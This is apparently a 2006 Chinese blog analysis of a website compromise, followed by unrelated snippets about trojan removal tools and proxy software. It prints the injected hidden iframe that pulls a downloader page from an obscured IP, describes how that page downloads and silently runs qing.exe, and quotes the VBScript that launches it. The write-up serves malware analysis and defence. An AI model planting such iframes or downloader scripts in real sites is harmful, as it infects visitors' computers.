endurer 原创
2006-12-18 第1版
网站首页被加入代码:
/----------
<iFrAmE SRc=hxxp://*58.215.*65.2*1/*****/k.htm width=1 height=1 frameborder=0></IfRaMe>
---------/
k.htm Kaspersky报为Trojan-Downloader.JS.Agent.bz,其内容可以分为4段。
第1段:
利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xxxx.exe,保存为 C:/windows/qing.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
xxxx.exe使用Watcom C/C++ EXE编译,
/-------
文件说明符 : D:/xxxx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-18 12:51:52
修改时间 : 2006-12-18 12:54:8
访问时间 : 2006-12-18 12:55:36
大小 : 19968 字节 19.512 KB
MD5 : d66859a23da410c0ca9e8daf387565b9
-------/
Kaspersky 报为:Trojan-Downloader.Win32.Agent.ue,瑞星 报为:Trojan.DL.Agent.yhm。
第2、3段:
是用unescape()和Encode多次加密的VBScript脚本程序,功能是下载yt.vbs,保存为%temp%/yt.vbs,并运行。
yt.vbs的内容为:
/--------------
wscript.sleep 0
wscript.createobject("wscript.shell").run "C:/windows/qing.exe",0
--------------/
功能是运行第1段代码下载的文件C:/windows/qing.exe。
第4段:
打开网页count.html
count.html其实是个CHM文件,释放并运行QQ.EXE。
此QQ.EXE与上面的xxxx.exe完全相同。
分享到:
相关推荐
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
俄罗斯安全软件Dr.Web,Trojan. Plastix木马感染文件解除工具plstfix
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
敲诈者木马程序以敲诈勒索钱财为目的,使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。该木马...
俄罗斯安全软件大蜘蛛Dr.Web,木马解锁工具.
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
2020年trojan最新windows64客户端
Trojan is a stable and efficient mobile lightweight log SDK that not only records general logs, such as Http, power changes, component life cycles, but also records the definition of the log, which it...
js.scob.trojan
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
我的电脑让学生插了一下U盘,结果电脑出现中毒现象(变慢、经常蓝屏、出错、自动重启),一查是染上了 假冒腾迅TXPLATFORM.EXE 的U盘病毒,属于 Trojan.Generic.Is.536802,此文介绍查杀方法
trojan-qt5.app.zip
trojan-qt5 for linux
Trojan Client
trojan
它是:“木马列表下载器变种B(Trojan.DL.Win32.List.b)”病毒。该病毒会在用户的计算机上悄悄运行,并从黑客指定的网站下载“灰鸽子”、“网络游戏木马”、“密西”等多个病毒、木马及其变种。用户计算机一旦感染了...
3、Trojan-Ransom.Win32.Agent.iih 4、Trojan-Ransom.Win32.Autoit 5、Trojan-Ransom.AndroidOS.Pletor (安卓下的勒索软件) 6、Trojan-Ransom.Win32.Rotor 7、Trojan-Ransom.Win32.Lamer 8、Trojan-Ransom.Win32....
这是一个只有bug修复的版本: [Bug修复] 修复Safari PAC不工作 [Bug修复] 修复断开连接后privoxy不会释放端口 [Bug修复] 修改PAC立即生效 [Bug修复] 修复不开启http模式还检查http端口是否占用的bug